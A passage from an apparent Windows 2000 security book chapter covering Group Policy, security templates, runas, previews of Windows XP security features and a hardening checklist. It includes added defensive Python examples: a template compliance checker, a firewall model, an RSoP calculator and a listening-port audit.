Editing a GPO reveals the wealth of security configuration it holds, which can be applied to many directory objects. Of particular interest is the Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options node of the GPO. It holds more than 30 parameters that can be configured to improve security on any computer object to which the GPO is applied. They include Additional Restrictions For Anonymous Connections (the RestrictAnonymous setting), LanManager Authentication Level, and Rename Administrator Account, three important settings that were reachable only through several different interfaces in NT4. The Security Settings node is also where Account Policies, Audit Policies, Event Log, Public Key, and IPSec policies can be set. By allowing these best practices to be set at the site, domain, or OU level, the security management burden in large environments is reduced significantly. The Default Domain Controllers GPO is shown in Figure 6-4.

GPOs seem to be the ultimate way to configure security across large Windows 2000 domains. However, you may get erratic results when mixing domain-level and local-level management, and the delay before Group Policy settings


take effect can also be frustrating. Using the secedit tool to refresh policy immediately is one way around the delay (secedit is covered in more detail below). To refresh policy with secedit, open the Run dialog and enter

secedit /refreshpolicy MACHINE_POLICY

To refresh the policies under the User Configuration node, enter

secedit /refreshpolicy USER_POLICY

Security Configuration Tools


Related to the Group Policy feature are the Security Configuration Tools, which consist of the Security Configuration and Analysis tool and the Security Templates tool. Security Configuration and Analysis lets administrators check a system's configuration for compliance with a predefined template and reconfigure any setting that does not match. It is available as an MMC snap-in or as a command-line version (secedit). This is a powerful mechanism for quickly determining whether a system meets baseline security requirements. Unfortunately, analysis and configuration can only be applied to the local system, not across a domain. The secedit utility can be used in logon batch scripts to push configuration and analysis to remote systems, but this is not as seamless as Group Policy's capabilities in a distributed environment. Fortunately, security templates can be imported into a Group Policy, so any domain, site, or OU to which the GPO applies receives the template's settings. To import a security template, right-click the Computer Configuration\Windows Settings\Security Settings node and choose Import from the context menu. Import defaults to the %windir%\security\templates directory, where the 11 standard security templates are stored.


Those 11 security templates, in fact, are also what populates the Security Templates tool. These template files represent various security levels and can be used with the Security Configuration and Analysis tool. Although many of their parameters are left undefined, they are good starting points when designing a template for analyzing and configuring systems. The files can be viewed through the Security Templates MMC snap-in or edited by hand with a text editor (again, they have the .inf extension and live in %windir%\security\templates\).
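The following Python script, an added example that is not Microsoft's tool, parses a template written in that .inf layout and reports the settings where a machine's current configuration differs from it, in the spirit of Security Configuration and Analysis; the template contents and the machine snapshot are constructed, while the RestrictAnonymous and LmCompatibilityLevel paths under MACHINE\System\CurrentControlSet\Control\Lsa are the real locations of the RestrictAnonymous and LanManager Authentication Level settings mentioned above.

```python
"""Parse a Windows 2000 security template (.inf) and report where a
machine's current settings differ from it, in the spirit of Security
Configuration and Analysis.

Added example, not Microsoft's tool. The template text and the machine
snapshot are constructed for the demonstration; the two Lsa registry paths
are the real RestrictAnonymous and LmCompatibilityLevel locations.
[Registry Values] entries use the template's 'type,data' form (4 = REG_DWORD).
"""
import configparser
import io

LSA = r"MACHINE\System\CurrentControlSet\Control\Lsa"
RESTRICT_ANONYMOUS = LSA + r"\RestrictAnonymous"
LM_COMPAT = LSA + r"\LmCompatibilityLevel"

# Constructed template, in the layout of the files in %windir%\security\templates.
SAMPLE_TEMPLATE = "\n".join([
    "[Unicode]",
    "Unicode=yes",
    "[System Access]",
    "MinimumPasswordLength = 8",
    "LockoutBadCount = 5",
    "[Registry Values]",
    RESTRICT_ANONYMOUS + "=4,2",
    LM_COMPAT + "=4,5",
    "[Event Audit]",
    "AuditLogonEvents = 3",
    "",
])

# Constructed snapshot of a box that was never hardened (same key names).
CURRENT_SETTINGS = {
    "System Access": {"MinimumPasswordLength": "0", "LockoutBadCount": "0"},
    "Registry Values": {RESTRICT_ANONYMOUS: "0", LM_COMPAT: "5"},
    "Event Audit": {"AuditLogonEvents": "0"},
}


def parse_template(text):
    """Return {section: {setting: value}}. In [Registry Values] the raw
    value is 'type,data'; only the data part is kept for comparison."""
    parser = configparser.ConfigParser(delimiters=("=",), interpolation=None)
    parser.optionxform = str   # keep the case of registry paths and names
    parser.read_file(io.StringIO(text))
    template = {}
    for section in parser.sections():
        settings = {}
        for key, raw in parser.items(section):
            if section == "Registry Values":
                _regtype, _, data = raw.partition(",")
                settings[key] = data.strip().strip('"')
            else:
                settings[key] = raw.strip()
        template[section] = settings
    return template


def analyze(template, current):
    """Return (section, setting, template value, current value) for every
    setting where the machine does not match the template, as Security
    Configuration and Analysis would flag it. Missing settings count too."""
    mismatches = []
    for section, wanted in template.items():
        if section == "Unicode":
            continue
        have = current.get(section, {})
        for key, value in wanted.items():
            if have.get(key) != value:
                mismatches.append((section, key, value, have.get(key)))
    return mismatches


if __name__ == "__main__":
    for section, key, want, have in analyze(parse_template(SAMPLE_TEMPLATE), CURRENT_SETTINGS):
        print(f"[{section}] {key}: template={want} current={have}")
```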

Runas

For those who are really into UNIX, coming to Windows always seemed like a step backwards, but Windows 2000 finally delivers a native user-switching command called runas. It has long been understood in security that you want the ability to run commands in the context of the least-privileged user account possible. Malicious Trojans, executables, e-mail messages, or remote Web pages in a browser can all launch commands with the privileges of the current user; the more privileges that user has, the worse the potential damage. Many such attacks can occur in everyday activity and are therefore particularly significant for anyone who needs Administrator privileges for part of their daily work (joining workstations to the domain, managing users, assigning routine tasks). Even where sound security practices are in place, those who happen to log on to their system as Administrator somehow never find the time to log back on as a normal user. In today's networked world this is truly dangerous. If an Administrator visits a harmful Web page or opens an HTML-formatted e-mail with embedded active content (see Chapter 16), the damage can be far greater than if Joe User made the same mistake on his standalone workstation. The runas command lets everyone log on as a less-privileged user and escalate to Administrator on a per-task basis. Suppose Joe is logged on to a domain controller as a normal User through Terminal Server and suddenly needs to change one of the Domain Admins passwords (perhaps one of them just left the premises unexpectedly). Unfortunately, as a normal user he cannot even start Active Directory Users And Computers to change the Domain Admin password. runas to the rescue. Here is what he does:


1. Select Start/Run and enter runas /user:mydomain\administrator "mmc %windir%\system32\dsa.msc"
2. Enter the Administrator password.
3. Once Active Directory Users And Computers starts (dsa.msc), he can change the Administrator password at will, with the privileges of the mydomain\Administrator account.
4. He then exits Active Directory Users And Computers and returns to his normal user session.

Our friend Joe has spared himself the hassle of logging off Terminal Server, logging back on as Administrator, logging off again, and logging on once more as a normal user. Task accomplished for the day.

One of the most common examples of smart runas use is running a web browser or mail reader as a less-privileged user. This, however, is where runas demands finesse, as a fairly long thread on the NTBugtraq mailing list in late March 2000 detailed (see http://www.ntbugtraq.com). Participants tried to work out exactly which privileges apply when a URL is launched in a browser window on a system with several windows open, including some running with runas /u:Administrator privileges. One suggestion was to keep a shortcut to the browser (minimized) in the Startup group, so that it always starts with the lowest privileges. The last word on using runas this way, however, is that for applications launched via Dynamic Data Exchange (DDE), such as IE, the critical security information is inherited from the process that creates them. So runas never really creates the processes needed to handle hyperlinks, embedded Word documents, and much else. Process creation is handled differently by each program, so it is very hard to determine true ownership. Perhaps Microsoft will someday clarify whether this is really a better security practice than logging out of all Administrator windows before launching a browser. runas is no silver bullet. As the Bugtraq thread pointed out, it reduces some risks but creates others (Jeff Schmidt). Use runas wisely.

TIP: Hold down SHIFT while right-clicking a file in Windows 2000 Explorer, and an option called Run As appears in the context menu.


THE FUTURE OF WINDOWS 2000


In this section we look ahead at a few new security-related technologies that will shape Windows 2000 as it evolves in the coming years. In particular, we examine the following developments:

.NET Framework
Windows XP / Codename Whistler

.NET FRAMEWORK


Microsoft's .NET Framework (.NET FX) provides an environment for building, deploying, and running Web Services and other applications. It should not be confused with Microsoft's overall .NET Initiative, which involves technologies following popular buzzwords such as XML; Simple Object Access Protocol (SOAP); and Universal Discovery, Description and Integration (UDDI). The .NET Framework is an important part of that initiative, but it is really a distinct technology foundation, separate from the overall .NET vision of the personal computer as a hub for services.

Indeed, many regard the .NET Framework as a feature-for-feature competitor to Sun Microsystems' Java programming environment and related services. Clearly this is a bold shift for Microsoft. It supports a development and execution environment entirely different from the traditional foundation of the Windows world, the Win32 API and NT services. Like the company's mid-1990s pivot that committed every product to the newly emerging Internet, the .NET Framework is an important inflection point for Microsoft. It will probably be bolted onto many other Microsoft technologies in the future. Understanding the prospects of this new direction is essential for anyone responsible for carrying Microsoft technology forward.

NOTE See Hacking Exposed Windows 2000 (Osborne/McGraw-Hill, 2001) for more on the .NET Framework.

CODENAME WHISTLER

No chapter on Windows 2000 security would be complete without a look at the new security features planned for the next version of the OS. As of this writing, Release Candidate 1 (RC1) of Codename Whistler has just been released, so a comprehensive analysis of these features would be premature. Nevertheless, we survey the features briefly and give our first impressions here.


Whistler Editions

The next generation of Windows is now split into client and server SKUs (stock-keeping units, i.e. product IDs). The client versions are called Windows XP and include the workstation-class Professional Edition (Windows XP Pro), the SOHO/consumer-oriented Home Edition, and the Windows XP 64-bit Edition for high-end specialised applications. The server versions will likely be called .NET Server (although they are still referred to by the codename Whistler) and will likely include the features of the old Server and Advanced Server. In summary:

Client
Windows XP Professional (workstation)
Windows XP Home Edition (consumer)
Windows XP 64-bit Edition (high-performance applications)

Server
.NET Server (Whistler)

NOTE Windows XP Home Edition is covered in Chapter 4.
Internet Connection Firewall

Internet Connection Firewall (ICF) may be the most visible security feature bundled into the new OS. ICF provides packet-filtering capabilities that allow outbound network use while blocking inbound connections.
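As an added illustration (not code from the book or from Microsoft's ICF), the following Python model shows the behaviour just described: connections the host opens pass in both directions because the filter remembers them, while unsolicited inbound connection attempts such as a stray Remote Desktop or NetBIOS probe are dropped. The host address, ports and the packet sequence are constructed sample data.

```python
"""Model of an inbound-blocking, outbound-permitting packet filter.

Added illustration of the ICF behaviour described above; it is not
Microsoft's code or the ICF implementation. The host address, ports and
packets below are constructed sample data.
"""
from dataclasses import dataclass

LOCAL_IP = "192.0.2.10"   # constructed: the protected workstation


@dataclass(frozen=True)
class Packet:
    src: str
    sport: int
    dst: str
    dport: int
    new_conn: bool   # True for a bare TCP SYN (a new connection attempt)


class InboundBlockingFilter:
    """Allow anything the host initiates; allow inbound traffic only when it
    belongs to a connection the host opened; drop everything else."""

    def __init__(self, local_ip):
        self.local_ip = local_ip
        # Connections opened from this host: (local port, remote ip, remote port)
        self.flows = set()

    def process(self, pkt):
        if pkt.src == self.local_ip:
            # Outbound: always permitted; remember the flow so replies pass.
            self.flows.add((pkt.sport, pkt.dst, pkt.dport))
            return "ALLOW"
        if pkt.dst == self.local_ip:
            # Inbound: only a non-SYN packet matching a flow we opened passes.
            if not pkt.new_conn and (pkt.dport, pkt.src, pkt.sport) in self.flows:
                return "ALLOW"
            return "DROP"
        return "DROP"   # not addressed to or from this host at all


def simulate():
    """Run a constructed packet sequence through the filter; returns decisions."""
    fw = InboundBlockingFilter(LOCAL_IP)
    web = "198.51.100.7"      # constructed: a remote web server
    unknown = "203.0.113.9"   # constructed: an unknown remote host
    packets = [
        Packet(LOCAL_IP, 40001, web, 80, new_conn=True),        # we open a web connection
        Packet(web, 80, LOCAL_IP, 40001, new_conn=False),       # its SYN/ACK reply
        Packet(unknown, 51234, LOCAL_IP, 3389, new_conn=True),  # unsolicited RDP connect
        Packet(unknown, 51235, LOCAL_IP, 139, new_conn=False),  # inbound with no matching flow
    ]
    return [fw.process(p) for p in packets]


if __name__ == "__main__":
    for decision in simulate():
        print(decision)
```

The flow table is the whole point: without it a filter would have to either block the web server's reply or open port 40001 to everyone. A real filter also expires flows and inspects TCP flags more carefully; this model keeps only the decision logic.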

Software Restriction Policies


Windows XP's Software Restriction Policies are Microsoft's next step in the war on malicious code, combining several separate features of earlier versions of the operating system into a unified defence against dangerous code such as e-mail-borne viruses.

Built-in Wireless Networking Authentication and Encryption
Secure Wireless/Ethernet LAN in Windows XP implements security for both wireless and wired LANs based on the IEEE 802.11 specification. Note that the LAN itself must enforce access control for this feature to be effective; but by building support into Windows, Microsoft aims to let the OS participate in such secured environments more easily and transparently.

NOTE Several attacks can defeat the current 802.11 security features. See Chapter 14 for details.


Integrated MS Passport Single Login for the Internet


In Windows XP, the Passport authentication protocols are added to WinInet (WinInet is the DLL that manages Internet connectivity). Passport is Microsoft's single sign-on solution for the Internet. User accounts are stored on servers run by Microsoft, and once a user has authenticated to the service, a tamper-resistant token is placed on the user's machine for a fixed period. This token can then be used to access other sites that support Passport authentication.
New Local and Group Policy Settings

Several new settings can be configured through Windows XP/Whistler Local and Group Policy, including one that controls the LAN Manager compatibility level. Besides the many new configurable settings, Whistler also introduces a new addition to Group Policy called Resultant Set of Policy (RSoP). RSoP does a great deal: it retrieves the intersection of the Group Policy objects applied at the various levels of the directory (site, domain, or OU) and returns the effective policy settings. Checking the order of policy application in this way can make troubleshooting considerably easier. RSoP is implemented as the command-line gpresult tool.
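The following Python model, added here and not Microsoft's gpresult or RSoP code, shows how a resultant set is computed from policy objects linked at the local, site, domain and OU levels: a later level overrides an earlier one for the same setting, and the winning GPO is recorded per setting, which is what makes RSoP useful for troubleshooting. Enforced links and Block Inheritance are left out of the model. The GPO names and settings (including the LmCompatibilityLevel value, the registry name of the LAN Manager compatibility setting) are constructed.

```python
"""Simplified Resultant Set of Policy computation.

Added example; not Microsoft's gpresult or RSoP implementation. It models
the standard Group Policy application order (local, then site, then domain,
then the OU chain from parent to child), where a setting applied later
overrides the same setting applied earlier. Enforced links and Block
Inheritance are deliberately left out. GPO names and settings are constructed.
"""
LEVELS = ["local", "site", "domain", "ou"]


def resultant_set(linked_gpos):
    """linked_gpos: list of (level, gpo_name, {setting: value}).

    OU entries must be listed parent first, child last; within one level the
    given order is preserved (stable sort), so the last listed wins.
    Returns (effective_settings, winning_gpo_per_setting)."""
    rank = {level: i for i, level in enumerate(LEVELS)}
    effective, winner = {}, {}
    for level, name, settings in sorted(linked_gpos, key=lambda g: rank[g[0]]):
        for key, value in settings.items():
            effective[key] = value          # later application overrides
            winner[key] = f"{level}:{name}"
    return effective, winner


def sample_rsop():
    """Constructed policy chain for a workstation in a domain, OU Workstations\\Kiosks."""
    gpos = [
        ("local", "Local Computer Policy",
         {"LmCompatibilityLevel": 0, "AuditLogon": "none"}),
        ("site", "Site-HQ",
         {"MinimumPasswordLength": 8}),
        ("domain", "Default Domain Policy",
         {"LmCompatibilityLevel": 2, "MinimumPasswordLength": 12}),
        ("ou", "OU-Workstations",
         {"LmCompatibilityLevel": 5, "AuditLogon": "success,failure"}),
        ("ou", "OU-Kiosks",
         {"MinimumPasswordLength": 14}),
    ]
    return resultant_set(gpos)


if __name__ == "__main__":
    effective, winner = sample_rsop()
    for key in sorted(effective):
        print(f"{key:24} = {effective[key]!s:18} (from {winner[key]})")
```

Reading the winner column is the troubleshooting step the text refers to: if a workstation still negotiates LM authentication, the report shows which linked GPO last set LmCompatibilityLevel rather than leaving you to inspect every level by hand.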
Credential Management

The Credential Management feature provides a secure store for user credentials, including passwords and X.509 certificates. It gives users, including roaming users, a consistent single sign-on experience by letting them reuse stored credentials easily rather than supplying them explicitly each time. Making it easier for users to cache passwords to other systems and keep them in one place does not strike us as a great idea. Of course, Windows already caches a great many credentials today in several separate places (Web site passwords in IE, dial-up account passwords, domain logon passwords in the LSA, and so on), so a single central store or API for securely holding this information could be a significant improvement. We will see.
Windows Product Activation

Although not strictly a security feature from the perspective of Microsoft's customers, Windows Product Activation (WPA) can certainly be seen as a very important security measure from Microsoft's perspective. In any case, WPA marks a decisive change in the evolution of Windows: with the exception of Volume Licensed (VL) editions, every client SKU of Windows will likely need to be activated by telephone or over the Internet.
Remote Management and Control

Windows XP/Whistler has two remote-control features built on terminal server technology. Both are managed from the Remote tab of the System Control Panel. The first is Remote Assistance, which is discussed in Chapter 14.
The second, Remote Desktop, is Terminal Server for Windows XP. (It is not available in the base edition.) It provides remote interactive logon to the Windows XP OS over the Remote Desktop Protocol (RDP), just like Terminal Server. RDP uses TCP 3389, which will be listening on machines with Remote Desktop enabled. Microsoft's current documentation suggests a typical scenario for using Remote Desktop: a company employee enables remote access to his or her office workstation and then connects to that system at night from home to finish up some unfinished tasks. We suspect many security administrators will have nightmares about this lurking on their networks.

Universal Plug and Play

Windows XP/Whistler adds optional support for Universal Plug and Play (UPnP), an evolving standard for discovering and identifying devices over networks. Picture your computer walking the network and identifying any printers, their capabilities, and so on. Of course, discovery is a two-way street, and other devices can likewise learn about your system via UPnP. Think of it as SNMP with automatic discovery and (typically) no authentication. If the UPnP service is installed manually (via Add/Remove Programs / Windows Components / Networking Services / Universal Plug and Play) and the UPnP Device Host service is enabled, the system listens on TCP 2869. This service responds to specially formatted HTTP commands. The Simple Service Discovery Protocol (SSDP) is also set up and listens on multiple IP addresses. In our opinion, UPnP should add authentication in version 2 of the protocol, and Microsoft should push to get it out.
Raw Sockets and Other Unfounded Claims

Many inflated claims about the security of Windows XP/Whistler are made daily, and many more assurances will be offered once it ships. Whether made by Microsoft, by those who support it, or by its many critics, these are claims that will only be settled by time and by testing in real-world conditions. Recently, the frequent security gadfly Steve Gibson made a much-publicised assertion that Windows XP's support for the programming interface known as raw sockets would lead to widespread IP address spoofing and to denial-of-service attacks built on such techniques. We leave readers to be the final judges of this assertion; our own position is summarised in the conclusions below on Windows security.

Most of the much-publicised insecurity of Windows results from common flaws that have existed across many other technologies for a long time; they are only made worse by Windows' widespread deployment. If you choose to use the Windows platform for the many reasons that make it so popular (ease of use, compatibility, and so on), you carry the burden of learning how to secure it and how to keep it that way. We hope you feel confident with the knowledge gained from this book. Good luck!
SUMMARY

Despite the notoriety of its IIS 5 exploits, Windows 2000 shows a solid improvement over NT4 in nearly every aspect of overall security. New security features such as IPSec and a properly deployed security policy also raise the bar for intruders and lighten the administrator's load. Here are a few security tips distilled from our discussion in this chapter and in Chapter 5 on NT, and from a selection of the best Windows 2000 security resources on the Internet:

- Read Hacking Exposed Windows 2000 for complete, end-to-end coverage of securing Windows 2000. That book covers and extends the information given here to deliver a comprehensive security analysis of Microsoft's flagship operating system and its future versions.
- Look at the summary of Chapter 5 for the baseline checklist for hardening NT. Most, if not all, of those settings still apply to Windows 2000. (Some of them, however, may appear in new parts of the UI, such as the Group Policy object Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options.)
- Use the security checklists Microsoft provides at http://www.microsoft.com/security. Microsoft also offers an IIS 5 configuration tool that lets users define templates based on good practice, which can then be created and applied to Windows 2000 Internet Information Servers.
- See http://www.microsoft.com/TechNet/prodtechnol/sql/maintain/security/sql2ksec.asp for information on securing SQL Server 2000 on Windows 2000, and see http://www.sqlsecurity.com for details on the most serious SQL vulnerabilities. Hacking Exposed Windows 2000 also devotes an entire chapter to SQL attacks and countermeasures from all sources.
- Remember that the operating-system level may not be where a system gets attacked. The application level is always far more at risk, especially modern, stateless, Web-based applications. Do your due diligence at the OS level using the information in this chapter, but focus primarily on protecting the application layer as a whole.
- It may sound childish, but make sure you deploy an appropriate edition of Windows 2000. The Server and Advanced Server products expose a large number of services (especially when configured as domain controllers, which is the default) and should be tightly shielded from untrusted networks, untrusted users, and anything else you are unsure about.
- Minimalism means higher security: if nothing is exposed, intruders have no way in. Use services.msc to disable unnecessary services. For the necessary services that remain, configure them securely; for example, configure the Windows 2000 DNS service to restrict zone transfers to specific servers.
- If file and print services are not needed, disable NetBIOS over TCP/IP by opening Network and Dial-up Connections, choosing Advanced\Advanced Settings, and unchecking File and Printer Sharing for Microsoft Networks for every adapter you want to protect, as illustrated in Figure 6-1 earlier in this chapter. This is the best way to configure the outward-facing interfaces of servers connected to the Internet.
- Use TCP/IP filters and the new IPSec filters (described in this chapter) to block access to every listening port except those absolutely necessary for minimal functionality.
- Protect the server's Internet interfaces with a firewall or a gateway equipped to limit denial-of-service attacks such as SYN floods and IP fragmentation storms. In addition, the steps given in this chapter harden Windows 2000 against standard IP-based DoS attacks and achieve a sensible configuration in which the IP stack is not exposed to those flaws.
- Keep current with all recent Service Packs and security hotfixes. See http://www.microsoft.com/security for the bulletin list of updates.
- Restrict interactive logon privileges to stop privilege-escalation attacks (such as named pipe prediction and window station problems) before they start. Whenever possible, log out of Terminal Server sessions rather than just disconnecting from them, so that no open administrator sessions are left for intruders to take over.
- Use the new tools such as Group Policy (gpedit.msc) and Security Configuration and Analysis with the bundled templates to help create and deploy secure configurations throughout your Windows 2000 environment.
- Follow a strong physical security policy to guard against the offline attacks on the SAM and EFS illustrated in this chapter. Running SYSKEY in password- or floppy-protected mode makes these attacks harder. Keep sensitive servers physically secure, set a BIOS password to protect the boot sequence, and remove or disable floppy drives and other media devices that could boot the system into an alternative OS.
- Follow the Best Practices for Using EFS found in the Windows 2000 help files, encrypting at the folder level for all user data where possible, especially for laptop users. Make sure you export and then delete the local copy of the recovery agent key, so that EFS-encrypted files are not vulnerable to offline attacks that compromise the Administrator recovery certificate.
- Subscribe to the NTBugtraq mailing list (http://www.ntbugtraq.com) to keep up with current discussion of NT/2000 security. If the volume of traffic on the list becomes too heavy for your taste, change your subscription to digest form, in which a digest of all important messages is sent out periodically. To receive the NTBugtraq list in digest form, send a message to listserv@listserv.ntbugtraq.com with the words NTBugtraq digest in the body of the message. (You do not need a subject line.) The Win2KSecAdvice mailing list at http://www.ntsecurity.net mirrors NTBugtraq and occasionally carries content that NTBugtraq misses. It also has a convenient digest version.
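As an added example serving both the Remote Desktop and UPnP discussion above (listeners on TCP 3389 and TCP 2869) and the summary's advice to expose only the services a host actually needs, the following Python script, which is not from the book or from Microsoft, parses constructed netstat -an output and reports every listener outside an explicit allowlist, annotating the ones this chapter names. The sample output, addresses and the web-server allowlist are constructed.

```python
"""Audit a host's listening ports against a minimal-services allowlist.

Added example; it is not from the book or from Microsoft. It parses
constructed `netstat -an`-style output and reports every listener outside an
explicit allowlist, annotating the ones this chapter names (NetBIOS/SMB,
RPC, Remote Desktop on TCP 3389, UPnP on TCP 2869). The sample output,
addresses and allowlist are constructed.
"""
import re

# Constructed sample, laid out like `netstat -an` on Windows.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:139            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:443            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:2869           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING
  TCP    192.0.2.10:80          198.51.100.7:40112     ESTABLISHED
  UDP    0.0.0.0:137            *:*
  UDP    0.0.0.0:138            *:*
"""

# Listeners this chapter discusses, keyed by (protocol, port).
KNOWN_SERVICES = {
    ("TCP", 135): "RPC/DCE endpoint mapper",
    ("UDP", 137): "NetBIOS Name Service",
    ("UDP", 138): "NetBIOS Datagram Service",
    ("TCP", 139): "NetBIOS Session Service",
    ("TCP", 445): "Microsoft SMB/CIFS",
    ("TCP", 2869): "UPnP Device Host",
    ("TCP", 3389): "Terminal Server / Remote Desktop",
}

# proto, local address, local port, foreign address, optional state
LINE_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+):(\d+)\s+(\S+)(?:\s+(\S+))?\s*$")


def parse_listeners(netstat_text):
    """Return the set of (proto, port) sockets that accept inbound traffic.

    TCP sockets count only in LISTENING state; every bound UDP socket counts,
    since netstat shows no state for UDP."""
    listeners = set()
    for line in netstat_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        proto, _local_addr, port, _foreign, state = m.groups()
        if proto == "TCP" and state != "LISTENING":
            continue
        listeners.add((proto, int(port)))
    return listeners


def audit_listeners(netstat_text, allowlist):
    """Report listeners not in the allowlist as (proto, port, description)."""
    unexpected = sorted(parse_listeners(netstat_text) - set(allowlist))
    return [(proto, port, KNOWN_SERVICES.get((proto, port), "not in chapter table"))
            for proto, port in unexpected]


if __name__ == "__main__":
    # Constructed allowlist for a public web server: only HTTP and HTTPS.
    WEB_SERVER_ALLOW = {("TCP", 80), ("TCP", 443)}
    for proto, port, desc in audit_listeners(SAMPLE_NETSTAT, WEB_SERVER_ALLOW):
        print(f"{proto} {port:<5} {desc}")
```

Each line of the report is a service to disable in services.msc, to unbind from the external adapter, or to block with a TCP/IP or IPSec filter, which is the procedure the summary describes; run against real netstat output, the same script gives a quick before-and-after check that the hardening actually took effect.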

